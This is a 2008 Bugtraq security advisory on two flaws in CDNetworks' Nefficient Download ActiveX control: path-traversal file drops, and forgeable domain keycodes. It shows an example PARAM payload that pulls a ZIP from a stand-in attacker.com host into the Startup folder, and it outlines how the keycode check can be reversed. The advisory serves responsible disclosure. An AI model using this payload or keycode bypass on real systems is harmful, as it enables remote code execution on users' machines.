CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
- To: BUGTRAQ@xxxxxxxxxxxxxxxxx
- Subject: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
- From: "Simon Ryeo" <bar4mi@xxxxxxxxx>
- Date: Mon, 7 Apr 2008 18:09:04 +0900
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=EYgkm1JqaoJpFtLQ5VXCbjU3Qb/kPN71e16OSPYA1o0=; b=NFrKM1xSLlkiqUOCvYP4UDSuwT5GCnQ72saNtBQvVH34/+3QytSAxx7jg9u5KnWqOaZEHYBVb+o04EYI1GjDdS8JqB6yaUbs1tWk/cVnJymILEveIVrtBKDtdyVUdxr4gvLjpr/9+MrMeiOShtbNBVgtomsAnZMn/5Cqx+VvSS0=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=eg4PakmfIU1WP8nWZIeZ1R7w1w/sG9WZlEeKu8QUWlYIvgP5IxI9gQZ4r/IvcYIYl8jInUorUsmoUBY3w9xWHH0qG2P7Zy4S1IvJ02/vLSI0TIMrCzBZ0zD25vcNTjd5rm5KLK8tli+UbfqoYy4OlWAwUYj52o5LaRgsTpX5ypA=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows Systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Upgrade the vendor's patch
Vendor's Homepage: http://www.cdnetworks.com
Reference: How to stop an ActiveX control from running in Internet Explorer
http://support.microsoft.com/kb/240797/ko
http://support.microsoft.com/kb/240797/en-us
History:
- 02.27.2008: Initiate notify
- 03.06.2008: The vendor patched
- After: The vendor are applying the patch to their customers.
Description:
Neffycient Download is a ActiveX control used to download and to upgrade
such as game install files through HTTP, FTP, etc. It has two
vulnerabilities.
1st, a attacker can copy a malicious file to any path such as start program
folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
2nd, a attacker can issue keycodes which are used to restrict execution on
other domains.
Object:
I notify this vulnerability not to promote abnormal uses but to make
a software more secure. This vulnerability was patched by the vendor's
positive effort. I hope this information helps many people who try
to study security and to develop an application.
1. Remote Code Execution
First of all, we must have write permission on a board in a web site used
this ActiveX or obtain a valid keycode which is correct to your site.
An Attacker who has a valid keycode can make a expolit by modifying
HttpSkin,
SkinPath's values. Malicious files which is on attacker's site must
be compressed as ZIP file.
For instance. The below modification copies abnormal files to Windows's
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
In this way an attacker can modify SkinPath's value to All Users's Start
Program Folder. Then he can execute his malicious program when the user
restarts his computer.
2. Generating a KeyCode Value
An attacker can make the keycode generator by debugging this ActiveX
control. A keycode's value has two meaning. First two digits represent
the domain's length(hexadecimal).
Next five(or more) digits are valuable numbers to calculate a domain.
The keycode check the procedure of this ActiveX control likes below.
It calculates the keycode's value and returns four bytes as a result.
Next it starts the domain's calculation and returns four bytes.
Finally, it compares with these four bytes to check whether the site is
valid.
I made a PoC using inline assembly and C. But it doesn't open to the public
because of the vendor's request. (Just refer above descriptions.)
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.7.1 (Build 1503)
Charset: utf-8
wj8DBQFH+eM+zuoR/xLtCioRAhKKAJ4nkA8EGap6fZ+xvRJSNpCDlcanwQCglsYb
p8LCGeXrEnMoshPDBVB4dOc=
=OZDe
-----END PGP SIGNATURE-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP Desktop 9.7.1 (Build 1503)
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
Z9c=
=JQcw
-----END PGP PUBLIC KEY BLOCK-----